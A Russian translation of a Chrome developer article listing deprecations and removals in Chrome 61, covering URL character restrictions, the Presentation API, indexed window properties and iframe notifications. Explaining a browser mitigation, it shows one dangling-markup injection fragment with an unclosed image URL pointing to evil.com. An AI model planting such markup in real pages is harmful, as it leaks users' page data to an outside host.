Устаревшие и удаленные версии Chrome 61

Джо Медли
Joe Medley

Почти в каждой версии Chrome мы видим значительное количество обновлений и улучшений продукта, его производительности, а также возможностей веб-платформы. В этой статье описаны устаревания и удаления в Chrome 61, бета-версия которого доступна с 3 августа. Этот список может быть изменен в любое время.

Безопасность и конфиденциальность

Блокировать ресурсы, URL-адреса которых содержат символы «\n» и «<».

Существует тип взлома, называемый внедрением висячей разметки , при котором усеченный URL-адрес используется для отправки данных во внешнюю конечную точку. Например, рассмотрим страницу, содержащую <img src='https://evil.com/? . Поскольку URL-адрес не имеет закрывающей кавычки, браузеры будут читать следующую кавычку и обрабатывать заключенные в нее символы так, как если бы это был один URL-адрес.

Chrome 61 смягчает эту уязвимость, ограничивая наборы символов, разрешенные в атрибутах href и src . В частности, Chrome прекратит обработку URL-адресов, если встретит символы новой строки ( \n ) и меньше символов ( < ).

Разработчики, у которых есть законный вариант использования новой строки и меньше символов в URL-адресе, должны вместо этого избегать этих символов.

Намерение удалить | Трекер Chromestatus | Ошибка хрома

Устареть и удалить Presentation API в небезопасных контекстах.

Было обнаружено, что в небезопасных источниках API Presentation можно использовать в качестве вектора взлома для небезопасных источников. Поскольку на дисплеях нет адресной строки, API можно использовать для подделки контента. Также возможно извлечь данные из запущенной презентации.

В соответствии с намерением Blink удалить мощные функции в небезопасных источниках мы планируем прекратить поддержку Presentation API в небезопасных контекстах. Начиная с Chrome 61, PresentationRequest.start() больше не будет работать в небезопасных источниках.

Намерение удалить | Трекер Chromestatus | Ошибка хрома

JavaScript

Запретить определение индексированных свойств в окнах

Ранее некоторые браузеры допускали такие назначения JavaScript, как следующие:

    window[0] = 1;

Текущая спецификация HTML отмечает , что это явное нарушение спецификации JavaScript. Таким образом, эта возможность удалена в Chrome 61. По состоянию на февраль 2016 года Firefox уже соответствует требованиям.

Ошибка хрома

Удалить использование уведомлений из небезопасных iframe

Запросы разрешений от iframe могут сбить с толку пользователей, поскольку трудно отличить происхождение содержащей страницы от источника iframe, отправляющего запрос. Когда объем запросов неясен, пользователям трудно решить, предоставить или отклонить разрешение.

Запрет уведомлений в iframe также приведет в соответствие требования к разрешению уведомлений с требованиями к push-уведомлениям, что облегчит работу разработчиков.

Разработчики, которым нужна эта функция, могут открыть новое окно и запросить разрешение на уведомление.

Намерение удалить | Трекер Chromestatus | Ошибка хрома